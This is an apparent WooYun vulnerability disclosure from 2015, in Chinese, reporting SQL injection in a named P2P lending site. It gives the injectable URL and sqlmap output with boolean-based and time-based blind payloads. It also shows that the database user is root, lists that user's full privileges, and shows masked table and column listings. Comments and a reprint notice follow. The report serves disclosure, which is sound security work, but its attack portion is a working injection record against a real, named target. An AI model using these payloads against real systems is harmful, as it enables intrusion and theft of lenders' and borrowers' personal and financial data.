缺陷编号:WooYun-2015-0125255
漏洞标题:p2p金融安全之紫枫信贷root权限注入(用户信息岌岌可危)
相关厂商:紫枫信贷
漏洞作者:DloveJ
提交时间:2015-07-08 11:08
公开时间:2015-08-22 11:10
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:18
漏洞状态:未联系到厂商或者厂商积极忽略
Tags标签:
2015-07-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-08-22: 厂商已经主动忽略漏洞,细节向公众公开
p2p金融安全之紫枫信贷root权限注入(用户信息岌岌可危)
1 |
注入点:http://www.zfxindai.cn/event/index/id/1.html |
sqlmap
1 2 3 4 5 6 7 8 9 |
Place: URI<br> Parameter: #1*<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause<br> Payload: http://www.zfxindai.cn:80/event/index/id/1) AND 9275=9275 AND (8214<br> =8214.htmlType: AND/OR time-based blind<br> Title: MySQL > 5.0.11 AND time-based blind<br> Payload: http://www.zfxindai.cn:80/event/index/id/1) AND SLEEP(5) AND (5803=<br> 5803.html<br>--- |
1 |
current user: 'root@%' |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 |
database management system users privileges:<br> [*] %root% (administrator) [26]:<br> privilege: ALTER<br> privilege: ALTER ROUTINE<br> privilege: CREATE<br> privilege: CREATE ROUTINE<br> privilege: CREATE TEMPORARY TABLES<br> privilege: CREATE USER<br> privilege: CREATE VIEW<br> privilege: DELETE<br> privilege: DROP<br> privilege: EVENT<br> privilege: EXECUTE<br> privilege: FILE<br> privilege: INDEX<br> privilege: INSERT<br> privilege: LOCK TABLES<br> privilege: PROCESS<br> privilege: REFERENCES<br> privilege: RELOAD<br> privilege: REPLICATION CLIENT<br> privilege: REPLICATION SLAVE<br> privilege: SELECT<br> privilege: SHOW DATABASES<br> privilege: SHOW VIEW<br> privilege: SUPER<br> privilege: TRIGGER<br> privilege: UPDATE<br> [*] %ucloudbackup% (administrator) [28]:<br> privilege: ALTER<br> privilege: ALTER ROUTINE<br> privilege: CREATE<br> privilege: CREATE ROUTINE<br> privilege: CREATE TABLESPACE<br> privilege: CREATE TEMPORARY TABLES<br> privilege: CREATE USER<br> privilege: CREATE VIEW<br> privilege: DELETE<br> privilege: DROP<br> privilege: EVENT<br> privilege: EXECUTE<br> privilege: FILE<br> privilege: INDEX<br> privilege: INSERT<br> privilege: LOCK TABLES<br> privilege: PROCESS<br> privilege: REFERENCES<br> privilege: RELOAD<br> privilege: REPLICATION CLIENT<br> privilege: REPLICATION SLAVE<br> privilege: SELECT<br> privilege: SHOW DATABASES<br> privilege: SHOW VIEW<br> privilege: SHUTDOWN<br> privilege: SUPER<br> privilege: TRIGGER<br> privilege: UPDATE |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 |
<mask>***** zfxi*****<br> *****tab*****<br> *****-------*****<br> ***** *****<br> *****log *****<br> ***** *****<br> ***** *****<br> ***** *****<br> *****e *****<br> *****d_rule *****<br> *****k *****<br> ***** *****<br> ***** *****<br> ***** *****<br> ***** *****<br> ***** *****<br> *****book *****<br> *****oans *****<br> *****efund *****<br> *****isk *****<br> ***** *****<br> ***** *****<br> *****ion *****<br> *****ion_log*****<br> *****ons *****<br> *****achment*****<br> *****ribute *****<br> *****h_exten*****<br> *****h_group*****<br> *****h_group*****<br> *****h_rule *****<br> *****tar *****<br> *****egory *****<br> *****nnel *****<br> *****ck_info*****<br> *****fig *****<br> *****trict *****<br> *****field *****<br> *****ument *****<br> *****ument_a*****<br> *****ument_d*****<br> *****nt *****<br> *****nt_atte*****<br> *****nt_type*****<br> *****ld *****<br> *****ld_grou*****<br> *****ld_sett*****<br> *****e *****<br> *****low *****<br> *****um *****<br> *****um_book*****<br> *****um_lzl_*****<br> *****um_post*****<br> *****um_post*****<br> *****ks *****<br> *****ue *****<br> *****ue_cont*****<br> *****al_comm*****<br> *****ber *****<br> *****u *****<br> *****sage *****<br> *****el *****<br> *****ture *****<br> *****nt_log *****<br> *****k *****<br> *****k_user *****<br> *****_rule *****<br> *****p *****<br> *****p_addre*****<br> *****p_buy *****<br> *****p_categ*****<br> *****p_confi*****<br> *****p_log *****<br> *****p_see *****<br> *****port *****<br> *****c_login*****<br> *****k *****<br> *****k_messa*****<br> *****k_messa*****<br> *****k_push *****<br> *****nyi_ver*****<br> *****nter_ad*****<br> *****nter_me*****<br> *****nter_se*****<br> ***** *****<br> *****r_token*****<br> *****e *****<br> *****e_recor*****<br> *****bo *****<br> *****bo_comm*****<br> *****bo_top *****<br> *****info *****<br> ***** *****<br> *****pply *****<br> ***** *****<br> *****comment*****<br> *****member *****<br> ***** *****<br> ***** *****<br> *****g *****<br> ***** *****<br> ***** *****<br> *****g *****<br> ***** *****<br> ***** *****<br> *****efund *****<br> *****tar *****<br> ***** *****<br> ***** *****<br> *****ert *****<br> *****st *****<br> ***** *****<br> ***** *****<br> ***** *****<br> *****s *****<br> *****ce *****<br> ***** *****<br> ***** *****<br> ***** *****<br> *****eport *****<br> *****oup *****<br> ***** *****<br> ***** *****<br> ***** *****<br> ***** *****<br> ***** *****<br> ***** *****<br> ***** *****<br> *****pay *****<br> *****ay *****<br> ***** *****<br> ***** *****<br> *****ail *****<br> ***** *****<br> *****-------*****<br></mask> |
163个表,我就不跑了。展示一部分表
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 |
<mask>*****isk *****<br> ***** *****<br> ***** *****<br> *****ion *****<br> *****ion_log*****<br> *****ons *****<br> *****achment*****<br> *****ribute *****<br> *****h_exten*****<br> *****h_group*****<br> *****h_group*****<br> *****h_rule *****<br> *****tar *****<br> *****egory *****<br> *****nnel *****<br> *****ck_info*****<br> *****fig *****<br> *****trict *****<br> *****field *****<br> *****ument *****<br> *****ument_a*****<br> *****ument_d*****<br> *****nt *****<br> *****nt_atte*****<br> *****nt_type*****<br> *****ld *****<br> *****ld_grou*****<br> *****ld_sett*****<br> *****e *****<br> *****low *****<br> *****um *****<br> *****um_book*****<br> *****um_lzl_*****<br> *****um_post*****<br> *****um_post*****<br> *****ks *****<br> *****ue *****<br> *****ue_cont*****<br> *****al_comm*****<br> *****ber *****<br> *****u *****<br> *****sage *****<br> *****el *****<br> *****ture *****<br> *****nt_log *****<br> *****k *****<br> *****k_user *****<br> *****_rule *****<br> *****p *****<br> *****p_addre*****<br> *****p_buy *****<br> *****p_categ*****<br> *****p_confi*****<br> *****p_log *****<br> *****p_see *****<br> *****port *****<br> *****c_login*****<br> *****k *****<br> *****k_messa*****<br> *****k_messa*****<br> *****k_push *****<br> *****nyi_ver*****<br> *****nter_ad*****<br> *****nter_me*****<br> *****nter_se*****<br> ***** *****<br> *****r_token*****<br> *****e *****<br> *****e_recor*****<br> *****bo *****<br> *****bo_comm*****<br> *****bo_top *****<br> *****info *****<br> ***** *****<br> *****pply *****<br> ***** *****<br> *****comment*****<br> *****member *****<br> ***** *****<br> ***** *****<br> *****g *****<br> ***** *****<br> ***** *****<br> *****g *****<br> ***** *****<br> ***** *****<br> *****efund *****<br> *****tar *****<br> ***** *****<br> ***** *****<br> *****ert *****<br> *****st *****<br> ***** *****<br> ***** *****<br> ***** *****<br> *****s *****<br> *****ce *****<br> ***** *****<br> ***** *****<br> ***** *****<br> *****eport *****<br> *****oup *****<br> ***** *****<br> ***** *****<br> ***** *****<br> ***** *****<br> ***** *****<br> ***** *****<br> ***** *****<br> *****pay *****<br> *****ay *****<br> ***** *****<br> ***** *****<br> *****ail *****<br> ***** *****<br> *****-------*****<br></mask> |
随便看一下其中的内容
1 2 3 4 5 6 7 8 9 10 11 12 13 |
<mask>*****lub_me*****<br> *****lum*****<br> *****---------*****<br> ***** *****<br> *****---------*****<br> ***** *****<br> *****10) unsig*****<br> *****(16) *****<br> *****(10) *****<br> *****umint(8) *****<br> *****int(3) un*****<br> *****10) unsig*****<br> *****--------*****<br></mask> |
非法的是我不敢,拒绝查水表
给高rank就可以不。
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)
小伙子
紫枫信贷不仅仅是注入的问题
原文连接
的情况下转载,若非则不得使用我方内容。